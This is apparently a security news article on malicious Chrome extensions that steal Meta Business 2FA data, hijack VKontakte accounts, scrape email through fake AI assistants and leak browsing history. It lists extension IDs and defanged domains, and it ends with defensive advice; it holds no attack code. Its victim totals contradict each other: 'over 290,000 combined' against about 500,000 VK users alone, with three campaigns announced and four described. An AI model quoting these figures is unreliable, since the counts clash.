Malicious Chrome Extensions Caught Stealing Business Data, Emails, and Browsing History
#Security

Malicious Chrome Extensions Caught Stealing Business Data, Emails, and Browsing History

Security Reporter
6 min read

Three major campaigns targeting Chrome extensions have been uncovered, stealing Meta Business Suite data, hijacking VKontakte accounts, and siphoning AI assistant credentials from over 290,000 users combined.

Cybersecurity researchers have uncovered three major malicious Chrome extension campaigns that collectively target over 290,000 users, stealing sensitive business data, hijacking social media accounts, and exfiltrating email content through seemingly legitimate browser tools.

Meta Business Suite Data Theft

A malicious Chrome extension called CL Suite by @CLMasters (ID: jkphinfhmfkckkcnifhjiplhfoiefffl) has been discovered stealing data from Meta Business Suite and Facebook Business Manager users. Marketed as a tool to scrape Meta Business Suite data and generate 2FA codes, the extension has 33 users and was first uploaded to the Chrome Web Store on March 1, 2025.

The extension requests broad access to meta.com and facebook.com domains, claiming in its privacy policy that 2FA secrets and Business Manager data remain local. However, security researcher Kirill Boychenko revealed that the code transmits TOTP seeds, current one-time security codes, Meta Business "People" CSV exports, and Business Manager analytics data to infrastructure controlled by threat actors at getauth[.]pro, with optional forwarding to a Telegram channel.

By targeting Meta Business Suite and Facebook Business Manager users, the threat actor conducts data collection and exfiltration without users' knowledge. While the extension doesn't steal password-related information directly, attackers could obtain such information from other sources like infostealer logs or credential dumps, then use the stolen 2FA codes to gain unauthorized account access.

The extension's full capabilities include:

  • Stealing TOTP seeds and 2FA codes
  • Extracting Business Manager "People" view data including names, email addresses, roles, and permissions
  • Enumerating Business Manager-level entities and their linked assets
  • Building CSV files of Business Manager IDs, attached ad accounts, connected pages, and billing configurations

Despite the low number of installs, Socket warned that the extension provides enough information for threat actors to identify high-value targets and mount follow-on attacks.

VKontakte Account Hijacking Campaign

Security firm Koi Security discovered that approximately 500,000 VKontakte users have had their accounts silently hijacked through Chrome extensions masquerading as VK customization tools. Codenamed VK Styles, this large-scale campaign has been traced to a threat actor operating under the GitHub username 2vk.

The malware embedded in these extensions engages in active account manipulation through several mechanisms:

  • Automatically subscribing users to the attacker's VK groups
  • Resetting account settings every 30 days to override user preferences
  • Manipulating Cross-Site Request Forgery (CSRF) tokens to bypass VK's security protections
  • Maintaining persistent control over hijacked accounts

The campaign primarily affects Russian-speaking users and those across Eastern Europe, Central Asia, and Russian diaspora communities globally. The malicious extensions include:

  • VK Styles - Themes for vk.com (ID: ceibjdigmfbbgcpkkdpmjokkokklodmc)
  • VK Music - audio saver (ID: mflibpdjoodmoppignjhciadahapkoch)
  • Music Downloader - VKsaver (ID: lgakkahjfibfgmacigibnhcgepajgfdb)
  • vksaver - music saver vk (ID: bndkfmmbidllaiccmpnbdonijmicaafn)
  • VKfeed - Download Music and Video from VK (ID: pcdgkgbadeggbnodegejccjffnoakcoh)

A defining trait of this campaign is the use of a VK profile's HTML metadata tags as a "dead drop resolver" to conceal next-stage payload URLs and evade detection. The next-stage payload is hosted in a public repository named "-" associated with 2vk, containing obfuscated JavaScript injected into every VK page victims visit.

Security researcher Ariel Cohen noted that the malware shows deliberate refinement with 17 commits between June 2025 and January 2026, demonstrating it's a maintained software project with version control, testing, and iterative improvements rather than sloppy malware.

AI Assistant Credential Theft

LayerX researcher Natalie Zargarov discovered a coordinated campaign dubbed AiFrame, where 32 browser add-ons advertised as artificial intelligence assistants have been installed by more than 260,000 users. These extensions, marketed for summarization, chat, writing, and Gmail assistance, hide dangerous architectures that siphon sensitive data.

Instead of implementing core functionality locally, these extensions embed remote, server-controlled interfaces inside extension-controlled surfaces, acting as privileged proxies that grant remote infrastructure access to sensitive browser capabilities. The malicious extensions include:

  • AI Assistant (ID: nlhpidbjmmffhoogcennoiopekbiglbp)
  • Llama (ID: gcfianbpjcfkafpiadmheejkokcmdkjl)
  • Gemini AI Sidebar (ID: fppbiomdkfbhgjjdmojlogeceejinadg)
  • AI Sidebar (ID: djhjckkfgancelbmgcamjimgphaphjdl)
  • ChatGPT Sidebar (ID: llojfncgbabajmdglnkbhmiebiinohek)
  • AI Sidebar (ID: gghdfkafnhfpaooiolhncejnlgglhkhe)
  • Grok (ID: cgmmcoandmabammnhfnjcakdeejbfimn)
  • Asking Chat Gpt (ID: phiphcloddhmndjbdedgfbglhpkjcffh)
  • ChatGBT (ID: pgfibniplgcnccdnkhblpmmlfodijppg)
  • Chat Bot GPT (ID: nkgbfengofophpmonladgaldioelckbe)
  • Grok Chatbot (ID: gcdfailafdfjbailcdcbjmeginhncjkb)
  • Chat With Gemini (ID: ebmmjmakencgmgoijdfnbailknaaiffh)
  • XAI (ID: baonbjckakcpgliaafcodddkoednpjgf)
  • Google Gemini (ID: fdlagfnfaheppaigholhoojabfaapnhb)
  • Ask Gemini (ID: gnaekhndaddbimfllbgmecjijbbfpabc)
  • AI Letter Generator (ID: hgnjolbjpjmhepcbjgeeallnamkjnfgi)
  • AI Message Generator (ID: lodlcpnbppgipaimgbjgniokjcnpiiad)
  • AI Translator (ID: cmpmhhjahlioglkleiofbjodhhiejhei)
  • AI For Translation (ID: bilfflcophfehljhpnklmcelkoiffapb)
  • AI Cover Letter Generator (ID: cicjlpmjmimeoempffghfglndokjihhn)
  • AI Image Generator Chat GPT (ID: ckneindgfbjnbbiggcmnjeofelhflhaj)
  • Ai Wallpaper Generator (ID: dbclhjpifdfkofnmjfpheiondafpkoed)
  • Ai Picture Generator (ID: ecikmpoikkcelnakpgaeplcjoickgacj)
  • DeepSeek Download (ID: kepibgehhljlecgaeihhnmibnmikbnga)
  • AI Email Writer (ID: ckicoadchmmndbakbokhapncehanaeni)
  • Email Generator AI (ID: fnjinbdmidgjkpmlihcginjipjaoapol)
  • DeepSeek Chat (ID: gohgeedemmaohocbaccllpkabadoogpl)
  • ChatGPT Picture Generator (ID: flnecpdpbhdblkpnegekobahlijbmfok)
  • ChatGPT Translate (ID: acaeafediijmccnjlokgcdiojiljfpbe)
  • AI GPT (ID: kblengdlefjpjkekanpoidgoghdngdgl)
  • ChatGPT Translation (ID: idhknpoceajhnjokpnbicildeoligdgh)
  • Chat GPT for Gmail (ID: fpmkabpaklbhbhegegapfkenkmpipick)

Once installed, these extensions render a full-screen iframe overlay pointing to a remote domain (claude.tapnetic[.]pro), allowing attackers to remotely introduce new capabilities without requiring Chrome Web Store updates. When instructed by the iframe, the add-ons query active browser tabs and invoke content scripts to extract readable article content using Mozilla's Readability library.

The malware also supports speech recognition capabilities, exfiltrating resulting transcripts to remote pages. A smaller set of extensions specifically target Gmail by reading visible email content directly from the Document Object Model (DOM) when victims visit mail.google[.]com. When Gmail-related features like AI-assisted replies or summaries are invoked, the extracted email content is transmitted to third-party backend infrastructure controlled by the extension operator, potentially sending email message text and contextual data off-device outside Gmail's security boundary.

Massive Browsing History Exfiltration

Adding to these concerns, a report by Q Continuum found a collection of 287 Chrome extensions that exfiltrate browsing history to data brokers. These extensions have accumulated 37.4 million installations, representing roughly 1% of the global Chrome userbase.

"It was shown in the past that Chrome extensions are used to exfiltrate user browser history that is then collected by data brokers such as Similarweb and Alexa," the researcher said.

Protection Recommendations

Given the risks involved, users are recommended to adopt a minimalist approach by only installing necessary, well-reviewed tools from official stores. It's essential to periodically audit installed extensions for any signs of malicious behavior or excessive permission requests.

Other ways users and organizations can ensure greater security include:

  • Using separate browser profiles for sensitive tasks
  • Implementing extension allowlisting to block malicious or non-compliant extensions
  • Regularly reviewing extension permissions and removing unused ones
  • Being cautious of extensions requesting broad website access
  • Monitoring for unusual account activity or unauthorized subscriptions

The three campaigns collectively demonstrate how web browser extensions are increasingly being abused by bad actors to harvest and exfiltrate sensitive data by passing them off as seemingly legitimate tools and utilities.

#Security#Vulnerabilities#privacy#Cybersecurity

Comments

Loading comments...
Back to Home